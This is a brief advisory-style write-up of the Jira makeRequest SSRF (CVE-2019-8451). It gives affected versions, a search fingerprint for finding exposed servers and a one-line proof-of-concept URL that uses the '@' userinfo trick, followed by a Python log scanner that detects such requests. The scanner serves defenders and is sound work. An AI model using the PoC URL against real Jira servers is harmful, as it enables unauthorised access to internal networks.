Atlassian Jira makeRequest SSRF vulnerability CVE-2019-8451
Vulnerability Description
Jira's /plugins/servlet/gadgets/makeRequest resource has an SSRF vulnerability caused by a logic flaw in JiraWhitelist. A remote attacker who successfully exploits this vulnerability can access intranet resources as the Jira server.
Vulnerability Impact
Atlassian Jira <8.4.0
Network surveying and mapping
app="ATLASSIAN-JIRA"
Vulnerability Reproduction
Login page
Verify POC
/plugins/servlet/gadgets/makeRequest?url=https://<target IP>@www.baidu.com/robots.txt
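Added example (not part of the original post and not Atlassian code): a log check that flags makeRequest calls whose url parameter, once parsed, points somewhere other than the Jira host, including the userinfo-before-@ form shown in the PoC above. The hostname jira.example.com, the ALLOWED_HOSTS set, the combined access-log format and the sample log lines are all assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/plugins/servlet/gadgets/makeRequest"
# Assumption: hosts the gadget proxy may legitimately fetch from.
ALLOWED_HOSTS = {"jira.example.com"}
# Request line of a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, not taken from a real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Oct/2019:10:00:00 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=https://jira.example.com/rest/feed HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Oct/2019:10:00:05 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=https://jira.example.com@www.example.org/robots.txt HTTP/1.1" 200 91',
    '203.0.113.7 - - [01/Oct/2019:10:00:09 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=https%3A%2F%2Fjira.example.com%40192.0.2.10%2F HTTP/1.1" 200 0',
    '10.0.0.8 - - [01/Oct/2019:10:01:00 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 20480',
]

def classify_target(raw_url, allowed=ALLOWED_HOSTS):
    """Return a reason string if the makeRequest target is suspicious, else None."""
    try:
        parts = urlsplit(raw_url)
    except ValueError:
        return "unparseable url"
    host = (parts.hostname or "").lower()
    if parts.username is not None:
        # In 'https://a@b/', 'a' is only userinfo; the request goes to 'b'.
        return f"userinfo before host, real destination {host}"
    if host not in allowed:
        return f"destination {host} is not an allowed host"
    return None

def scan(lines, allowed=ALLOWED_HOSTS):
    """Return (line_number, reason) for each suspicious makeRequest call."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        req = urlsplit(m.group(1))
        if req.path != ENDPOINT:
            continue
        # parse_qs percent-decodes, so an encoded '@' (%40) is caught too.
        for target in parse_qs(req.query).get("url", []):
            reason = classify_target(target, allowed)
            if reason:
                hits.append((n, reason))
    return hits

if __name__ == "__main__":
    for n, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```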
This post is licensed under CC BY 4.0 by the author.